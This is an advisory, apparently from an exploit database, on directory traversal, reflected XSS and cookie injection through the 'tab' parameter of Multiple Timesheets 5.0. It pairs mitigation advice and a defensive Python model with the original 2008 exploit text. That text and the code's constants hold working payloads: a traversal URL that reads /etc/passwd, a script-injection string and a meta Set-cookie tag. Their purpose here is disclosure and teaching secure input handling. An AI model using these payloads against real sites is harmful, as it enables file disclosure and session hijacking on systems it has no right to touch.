Vendor: Multiple Timesheets
By: JosS
CVSS: 7.5 (HIGH)
Vulnerability Types: Directory Traversal, Cross Site Scripting, Cookie Manipulation
CWE: 22 (Path Traversal), 79 (Cross-site Scripting), 614 (Cookie Manipulation)
Product Name: Multiple Timesheets
Affected Version From: 5.0 and prior
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

Multiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities

Multiple Timesheets version 5.0 and prior passes the `tab` request parameter of index.php to the filesystem and reflects it back into the page without validation. An attacker can use it to read arbitrary files the web server account can open (the published example retrieves /etc/passwd), to inject script into the page (reflected cross-site scripting), and, through that same HTML injection, to plant a `<meta http-equiv='Set-cookie'>` tag that sets cookies in the victim's browser. The advisory demonstrates file disclosure and script injection only; it does not show code execution, which would require the parameter to reach include() or a similar call. The doubled `..//` segments in the published traversal payload suggest the author was working around a naive string-stripping filter, although the advisory does not say so. Current browsers no longer honour `<meta http-equiv="Set-cookie">` (Chrome dropped it in version 65, Firefox in 68), so today the cookie-manipulation vector relies on the injected script writing document.cookie instead.

Mitigation:

Upgrade to a version of Multiple Timesheets that fixes the issue (the listing records that a patch exists but does not link it). If the application must stay in place, map `tab` server-side to a fixed allowlist of page names instead of using it to build a file path, reject any value containing a path separator or `..`, and HTML-encode it wherever it is reflected into the response. Mark session cookies HttpOnly so injected script cannot read them.
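The following Python model is an added example, not code from Multiple Timesheets or from the advisory. It reproduces the index.php?tab= handling described above on the advisory's own payloads: the vulnerable concatenate-and-resolve pattern, a survey of hypothetical one-pass string filters (the page does not say what, if anything, the application filtered), and an allowlist resolver plus output encoding as the fix. The install path /var/www/mts and the tab-to-file mapping are assumptions.

```python
"""Added example: models index.php?tab= handling from the advisory above.
Not code from the Multiple Timesheets project or from the advisory itself."""
import html
import posixpath

# Payloads as published in the advisory.
TRAVERSAL_PAYLOAD = "../..//" * 8 + "etc/passwd"
XSS_PAYLOAD = ">'><ScRiPt \n\r>alert(\"JosS\");</ScRiPt>"

# Assumed web root of the application (not given on the page).
BASE_DIR = "/var/www/mts"

# Assumed mapping of legitimate tabs to files. The file names come from the
# advisory's "Vuln File" list; the mapping itself is hypothetical.
TAB_FILES = {
    "clientinfo": "clientinfo.php",
    "invoices": "invoices.php",
    "smartlinks": "smartlinks.php",
    "todo": "todo.php",
}


def resolve_unsafe(base, tab):
    """Vulnerable pattern: $base . '/' . $_GET['tab'], then let the filesystem
    normalise it. Models PHP string concatenation followed by path resolution."""
    return posixpath.normpath(base + "/" + tab)


def escapes_base(base, path):
    """True when a resolved path lies outside the application directory."""
    base = posixpath.normpath(base)
    return not (path == base or path.startswith(base + "/"))


def naive_strip(tab, needle):
    """Hypothetical one-pass substring removal, as PHP str_replace() does it.
    The advisory does not show what filtering, if any, the application applied."""
    return tab.replace(needle, "") if needle else tab


def filter_survey(base=BASE_DIR, payload=TRAVERSAL_PAYLOAD):
    """Where does the advisory's payload end up after each candidate filter?
    Explains the doubled '..//' segments: a single-pass strip of './' (or no
    filter at all) still resolves to /etc/passwd."""
    return {
        needle: resolve_unsafe(base, naive_strip(payload, needle))
        for needle in ("", "../", "./", "..")
    }


def resolve_safe(tab, base=BASE_DIR, allowed=TAB_FILES):
    """Hardened pattern: the parameter selects a key, never a path."""
    if tab not in allowed:
        raise ValueError("unknown tab")
    path = posixpath.normpath(base + "/" + allowed[tab])
    # Defence in depth: even a bad allowlist entry must stay under base.
    if escapes_base(base, path):
        raise ValueError("tab maps outside the application directory")
    return path


def render_tab_label(tab):
    """Reflecting the parameter into HTML needs context-appropriate escaping;
    html.escape() also encodes quotes, so the value is safe inside attributes."""
    return "<h1>Tab: {}</h1>".format(html.escape(tab, quote=True))


if __name__ == "__main__":
    for needle, resolved in filter_survey().items():
        verdict = "ESCAPES" if escapes_base(BASE_DIR, resolved) else "contained"
        print("strip {!r:6} -> {} ({})".format(needle, resolved, verdict))
    print(resolve_safe("todo"))
    print(render_tab_label(XSS_PAYLOAD))
```

Running it shows that, under the assumed concatenation, stripping `../` or `..` once would have kept the published payload inside the application directory, while stripping `./` (or nothing) lets it reach /etc/passwd. The filter survey is the point: a blocklist only ever blocks the variants its author thought of, so the fix is the allowlist resolver, with HTML encoding covering the reflected copy of the same parameter.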

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+              Multiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities          +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Multiple Timesheets
[~] Download: http://riceball.com/drupal/files/mts-5.zip
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Good!

[+] Directory traversal:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[FILE]
[~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[+] Cross Site Scripting:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[XSS]
[~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>

[+] Cookie Manipulation:

[~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php
[~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie]
[~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-03-16]